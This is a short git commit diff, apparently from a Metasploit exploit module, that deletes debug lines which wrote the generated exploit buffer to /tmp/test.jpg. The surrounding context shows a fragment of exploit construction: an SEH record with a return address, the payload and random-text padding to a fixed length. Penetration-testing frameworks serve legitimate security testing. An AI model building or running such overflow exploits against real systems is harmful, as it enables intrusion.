delete debug code
parent
dffec1cd41
commit
4aab1cc5df
|
@ -86,10 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
sploit << generate_seh_record(target.ret)
|
sploit << generate_seh_record(target.ret)
|
||||||
sploit << p
|
sploit << p
|
||||||
sploit << rand_text(2388 - p.length)
|
sploit << rand_text(2388 - p.length)
|
||||||
|
|
||||||
f = ::File.open("/tmp/test.jpg", "wb")
|
|
||||||
f.write(sploit)
|
|
||||||
f.close
|
|
||||||
return sploit
|
return sploit
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue